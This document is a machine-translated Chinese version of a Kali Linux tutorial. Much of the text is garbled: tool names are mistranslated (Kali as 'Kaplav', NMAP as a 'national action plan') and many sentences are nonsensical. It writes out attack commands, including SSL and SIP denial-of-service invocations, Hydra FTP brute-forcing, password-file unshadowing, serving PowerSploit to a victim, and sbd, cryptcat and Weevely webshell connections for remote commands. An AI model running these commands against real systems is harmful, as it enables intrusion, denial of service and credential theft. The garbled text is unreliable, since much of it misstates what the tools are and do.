- Kali Linux - Reporting Tools
- Kali Linux - Reverse Engineering
- Kali Linux - Maintaining Access
- Kali Linux - Password Cracking Tools
- Kali Linux - Sniffing & Spoofing
- Kali Linux - Stressing Tools
- Kali Linux - Social Engineering
- Kali Linux - Forensics Tools
- Kali Linux - Exploitation Tools
- Website Penetration Testing
- Kali Linux - Wireless Attacks
- Vulnerability Analyses Tools
- Information Gathering Tools
- Installation & Configuration
- Kali Linux - Home
Kali Linux Useful Resources
Selected Reading
- Who is Who
- Computer Glossary
- HR Interview Questions
- Effective Resume Writing
- Questions and Answers
- UPSC IAS Exams Notes
Kap Linux - Quick Guide
Kap Linux - Installation and Configuration
Kaplav是一家伦理黑客的最佳安全一揽子计划之一,其中包含一套按类别分列的工具。 它是一个公开的来源,其官方网页是
BackTrack是旧版本的Kaplav distribution。 最新释放是Kap2016,1 并且经常更新。
1. 安装Kaplav公司
First, we will download the Virtual box and install it.
Later, we will download and install Kap Linux distribution.
Download and Install the Virtual Box
当你想在加里夫测试你所不掌握的东西时,一个虚拟的方框特别有用。 如果你想要试验未知的包裹,或者你想测试一部法典,那么把加里夫拖在虚拟箱子上是安全的。
在虚拟盒子的帮助下,你可以把加里夫安装在你的系统上(不是直接安装在硬盘上),同时安装能够使用MAC或Windows或另一个光束的Windows。
让我们了解你如何下载和在贵系统安装虚拟箱。
Step 5 -CpckYes,以着手安装。
Step 7-Cpck the Finishhton。
如以下屏幕所示,虚拟方框应用程序现在开放。 现在,我们准备为本手册安装其他主机,并建议使用该手册。
Install Kap Linux
现在我们已经成功安装了虚拟箱,让步进入下一步,安装了Kaplav。
Update Kap
重要的是不断更新加里尼奥斯及其新版本的工具,以保持功能。 以下是更新Kap的步骤。
Laboratory Setup
在本节中,我们将建立另一台测试机器,在Kaplavt的工具的帮助下进行测试。
Step 5——建立虚拟机器人台的屏幕。 Cpck “Create”。 缺省用户名称为msfadmin。 页: 1 在这一章中,我们将讨论加里尼奥的信息收集工具。 NMAP和ZentMAP是用于在Kaplav进行道德 Hack升的有益工具。 NMAP和ZentMAP实际上都是相同的工具,但NMAP则使用指挥线,而ZentMAP则有一个GUI。 国家行动计划是网络发现和安全审计的一个免费工具。 许多系统和网络管理员也认为,网络盘存、管理服务升级时间表以及监测东道或服务时间等任务是有益的。 国家排雷方案以新的方式使用原始IP包,以确定网络上有哪些东道方,提供哪些服务(申请名称和版本),哪些东道国正在运营哪些操作系统(和OS版本),哪些类型的包装过滤器/防火墙正在使用等。 现在,让我们一步步走,学习如何使用《国家行动计划》和《泽斯喀同盟》。 <-g = 基因统计Kap Linux - Information Gathering Tools
NMAP and ZenMAP
-i 10 = 使用10秒钟等待数据
-r 200 = 200 connection with -t GET = GET申请
-u> http://192.168.1.202/index.php = 目标URL
-x 24 = 不超过24英亩
-p 2 = 2秒
试验一旦开始,产出将如以下屏幕所示,届时你可以注意到该服务已经提供。
之后,在287条连接线上,服务中断。 这意味着服务器能够处理最多287个吉大港山区连接点。
Inviteflood
特约洛德是SIP/SDP INVITE的电文,在UDP/IP上空淹没。 它在各种含水层分布上执行。 它通过发出多次国际投资争端解决中心的请求,对SIP装置进行多功能攻击。
开放专用电话,首先开放终端和“inviteflood -paraifs”。
您可使用“inviteflood -h”。
其次,你可以使用以下指挥系统:
inviteflood eth0 target_extension target_domain target_ip number_of_packets
如果有,
target_extension, 2000年
target_domain is 192.168.x.
target_ip is 192.168.x.
-a是SIP账户的其他内容
Iaxflood
Iaxflood是VoIP DoS的工具。 开放,“axflood sourcenameapat num Packets”>。
了解如何使用“iaxflood -h”
thc-ssl-dos
THC-SSL-DOS是核查SSL业绩的工具。 建立有保障的SSL连接要求服务器的加工能力比客户多15x。 THCSSL-DOS利用这种不对称财产,超载服务器,将其从互联网上打碎。
指挥:
thc-ssl-dos victimIP httpsport –accept
就是:
thc-ssl-dos 192.168.1.1 443 –accept
其产出如下:
Kap Linux - Sniffing & Spoofing
传播工具的基本概念非常简单,因为电离线和加里夫在这方面拥有一些受欢迎的工具。 在本章中,我们将了解在加里现有的传播和传承工具。
Burpsuite
申请可用作浏览器和网络服务器之间的沟通工具,以找到网络应用所使用的参数。
开放申请申请——网络申请分析——付费。
为了打上iff子,我们把bur作为代理人。 为此,请在以下屏幕上显示申请。 如所示,核对箱子。
在这种情况下,代理IP将为127.0.0.1港,8080港。
然后没收了装饰机和港口的 IP。
为了开始拦截,前往Proxy ——Intercept ——点击“Intercept is on”。
继续在你希望找到参数以测试脆弱性的网页上航行。
在这种情况下,该机器是可操作的机器,有IP 192.168.1。
Go to “HTTP history. 在下面的屏幕上,红色箭标线显示最后一项要求。 在Raaw和隐蔽的参数,如会议设计书和其他参数,如用户名称和密码,都用红字加以强调。
mitmproxy
mitmproxy 是SSL-capable man-in-the-middle HTTP代理。 该系统提供一种黄色接口,使空中交通能够接受检查和在航空上进行编辑。
开放至终点站和类别“下限-参数” http://www.un.org/Depts/DGACM/index_french.htm
开始使用最低轨道,“mitmproxy -p Port number”>。 在该案中,是“mit-p 80”。
Wireshark
电机是最佳数据包装分析器之一。 它在框架层面对包装进行深入分析。 您可从其官方网页
在你点击电线后,以下全球倡议打开了大门。
如以下屏幕所示,浮标“Start”和包装物捕获将开始。
sslstrip
slstrip是MITM攻击,迫使受害者浏览器在吉大港山区进行便衣通信,而轴心则从HTTPS服务器更改内容。 为了做到这一点,Sslstrip是“stripping” https://URLs,并将其变为http://URLs。
开放申请——09-Sniffing &Spoofing ——Spoofing and MITM ——slstrip。
为设立这一机制,将80份港口通信全部转交8080份。
然后,开始slstrip。 港口需要指挥。
Kap Linux - Password Cracking Tools
在本章中,我们将了解在加里尼奥斯使用的重要密码压制工具。
Hydra
Hydr是一种支持许多攻击议定书的 log(Cisco AA、Cisco auth、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、HTTP(S)---HEAD、HTTP-Proxy、ICQ、IMAP、LDAP、LDAP-SQL、MSQL、NNTP、Oracleener、SID、PC-Any、PC-S、PC-SES、RPS、RPS、L、RNS3
开放申请:通过口号攻击——在线攻击——水。
如以下屏幕所示,它将开放终端星群。
在这种情况下,我们将向FTP提供可使用机器,即IP 192.168.1.101。
我们在Kap创建了一个在上添加“lst”的字表。
指挥如下:
hydra -l /usr/share/wordpsts/metasploit/user -P /usr/share/wordpsts/metasploit/ passwords ftp://192.168.1.101 –V
-V> 是用户名和密码,同时审判
如以下屏幕所示,用户名和密码是“mfadmin:msfadmin”。
Johnny
Johnny 是John Ripper密码快讯工具的GUI。 一般来说,它被用于软弱的密码。
开放申请——口号攻击—— j。
在这种情况下,我们将获得Kap机器的密码,其指挥如下,并将在桌面上建立档案。
Cpck “Open Passwd file” - OK,所有档案都将在以下屏幕上显示。
Cpck “Start Attack”。
袭击完成后,将左小组点击到“密码”,口号将不予回击。
John
john是Johnny GUI的指挥线。 开放码头,开放“john”。
如果密码蒙上阴影,我们需要写以下指挥——
root@kap:~# unshadow passwd shadow > unshadowed.txt
Rainbowcrack
彩虹Crack软件裂缝通过雨布桌盘 look。 彩虹表格是储存在硬盘上的普通文档。 一般来说,彩虹表格是在线购买的,或者可以用不同的工具汇编。
开放该平台,前往申请——“口号攻击”——点击“留波克”。
镇压散装口的指挥是——
rcrack path_to_rainbow_tables -f path_to_password_hash
SQLdict
它是一种用于服务器的定型攻击工具,非常容易和基本使用。 开放时间,开放终点站和“sqldict”。 它将提出以下意见。
在“Target IP服务器”下,进入了持有KQ的服务器的IP。 在“目标账户”下,进入用户名。 然后将档案装上密码,并点击“开端”,直至其结束。
hash-identifier
它是用来确定海螺类型的工具,即它们正在使用什么。 例如,如果我有讲卫生运动,那么如果它是一条龙线或窗户,它就可以告诉我。
上述屏幕显示,它可以是MD5的散射器,它似乎是一种随地盘旋的硬质。
Kap Linux - Maintaining Access
在本章中,我们将看到加里用于维持连接和进入破碎机器的工具,即使它再次连接和脱节。
Powersploit
这是一个用于Windows机器的工具。 它安装在受害人机器上。 这一工具帮助黑客通过PowerShell与受害者机器连接。
开放,在左边打开终点站,并打造以下指挥系统,以进入权力分管——
cd /usr/share/powersploit/
如果是“ls” 这份清单将列出在你获得访问后你能够下载和安装受害人机器的所有权力开发工具。 其中大多数是按姓名自行解释的。
在受害者机器上下载这一工具的一个容易的方法是建立一个网络服务器,该服务器授权使用各种工具,便于使用以下指挥系统:
python -m SimpleHTTPServer
之后,如果是:http://<Kap organ ip_address>:8000/以下是结果。
Sbd
s是一种类似于Netcat的工具。 该软件是可携带的,可以用于六氯环己烷和微软机器。 缩略语 基本上,它有助于在某个港口随时与受害人的机器连接,并远程发送指挥。
开放到终端站和“sbd -l-pport”,供服务器接受连接。
在这种情况下,让我们把44号港口放在服务器将倾听的地方。
在受害人的现场,“sbd IPofserver port”。 将建立连接,使我们能够派遣遥控指挥部。
在这种情况下,它是“当地人”,因为我们对同一机器进行了测试。
最后,在服务器上,你会看到,接线已经发生,如以下屏幕所示。
Webshells
可通过网站浏览或浏览。 但是,大多数检测到的是抗病毒。 C99 php壳在抗病毒中广为人知。 任何共同的抗病毒都很容易被检测为一种mal。
一般来说,其主要职能是通过网络接口发送系统指挥。
>>>在终点站开放。
如你所知,根据编程语言,他们分班:p , aspx, cfm, jsp, perl,php
如果你进入PHP的夹,你就可以看到网站的所有网址。
如“简单门槛”:php 开放网页和电子版。
最终写上三重指挥。 您将具备以下屏幕显示的所有信息。
Weevely
韦利是PHP网壳,模拟类似电话的连接。 它是网络应用后开发的工具,可以用作偷窃的后门或网吧,管理合法网站账户,甚至免费的主机。
开放,进入终点站和“全身”类型,看看其使用情况。
为产生弹壳,“立即产生密码径流”。 如以下屏幕所示,该软件在“台站”夹上生成,文档将上载到一个网络服务器上,以便上网。
在上载以下屏幕显示的网壳后,我们可以使用指挥“韦ly URL密码”与服务器连接。 你可以看到,会议已经开始。
http-tunnel
http-tunnel生成一条双向虚拟数据流,在吉大港山区应用方案的要求中 tunnel。 如果有此愿望,可以通过吉大港山区替代物发出这些请求。 这对限制性防火墙的使用者是有益的。 如果允许WWWWW通过吉大港警察局的代理进入,那么它就能够使用http-tunnel和电话或PP与防火墙外的计算机连接。
第一,我们应当建立一个隧道服务器,其指挥如下:
httptunnel_server –h
然后,在客户网站类型“httptunnel_cpent-h”上,双方将开始接受连接。
dns2tcp
这再次成为一条隧道工具,有助于通过国家航天中心交通,即UDP 53港口。
开始,“dns2tcpd”>。 当你将打开文字时,就对使用作了解释。
在服务器站,进入这一指挥系统,没收档案。
#cat >>.dns2tcpdrc <&l;END psten = 0.0.0.0 port = 53 user=nobody chroot = /root/dns2tcp pid_file = /var/run/dns2tcp.pid domain = your domain key = secretkey resources = ssh:127.0.0.1:22 END #dns2tcpd -f .dns2tcpdrc
在客户所在地,进入这一指挥部。
# cat >>.dns2tcprc <<END domain = your domain resource = ssh local_port = 7891 key = secretkey END # dns2tcpc -f .dns2tcprc # ssh root@localhost -p 7891 -D 7076
隧道工程将从这一指挥部开始。
cryptcat
它是另一个工具,如Netcat,使TCP和UDP能够以加密方式与受害人机器连接。
a. 开办一个服务器,听取联系,类型如下:
cryptcat –l –p port –n
如果有,
<-p 港口号参数表
在客户所在地,连接指挥部为“密码IPofServer PortofServer”。
Kap Linux - Reverse Engineering
在本章中,我们将了解加里尼奥斯的反向工程工具。
OllyDbg
OllyDbg是MicrosoftWindows应用软件的32级汇合器级分析仪。 强调双亲代码分析,在缺乏来源的情况下特别有用。 一般说来,它被用于打碎商业软件。
开放申请——逆向工程——ollydbg
为装上EXE文档,可上黄色“Opening ridgeer”,上面插图的红广场就显示了这一点。
在装货后,你将提出以下看法,以便改变双月。
dex2jar
这项申请有助于将APK(android)档案转换为JAR档案,以便查看来源代码。 为了使用,打开终点站并撰写d2j-dex2jar -d /file place”。
在这种情况下,档案在桌面上是“舱位”。
下面一行显示,已经建立了一个联合调查组档案。
jd-gui
JD-GUI是一种独立的图形用途,显示 Java源代码. . . . . . . /b>文档。 你们可以浏览重建的源代码。 在这种情况下,我们可以重建从dex2jar工具中提取的档案。
为发射该终端,开放并撰写“jd-gui”,以下意见将开放。
为输入档案,点击了开放的圆夹。 icon在左上角,然后进口档案。
apktool
Apktool是扭转整个海底应用的最佳工具之一。 它可以将资源编码到几乎一种原始形式,并在作出修改后加以重建。
开放至终点站,并写到“pktool”。
To decompile a a apk file, written “apktool d apk file”。
完成工作将如以下屏幕所示开始。
Kap Linux - Reporting Tools
在本章中,我们将了解在加里尼奥斯的一些报告工具。
Dradis
在我们开展的所有这项工作中,重要的是分享所取得的成果,跟踪我们的工作等等。 为此,Kap拥有一个称为网络服务的报告工具。
The web URL will open. 任何国家均可在以下网址上开放:URL https://IPkap organ:3004
首次使用的用户名和密码。
Step 3——在伐木之后,你可以从NMAP、NESSUS、NEXPOSE进口档案。 为此,“从档案中进口”——点击“新进口商(有实时反馈)”。
如果你现在去回家,在左边的小组上,你会看到进口的扫描器有其东道国和港口细节的夹。
Metagoofil
梅塔戈菲尔斯在谷歌进行搜索,以查明这些文件并将其下载到当地磁盘上,然后提取元数据。 它提取属于特定公司、个人、物体等的公共文件元数据。
开放:。
开始搜查,类型如下:
python metagoofil.py
你可以使用这一指挥的以下参数:
-t(下载狗的档案类型,pdf,etc)
-l(结果10,100>)
-n(下载的有限档案)
-o(保存档案的地点)
<-f>> (产出档案)
下面的例子只表明域名是隐蔽的。
Advertisements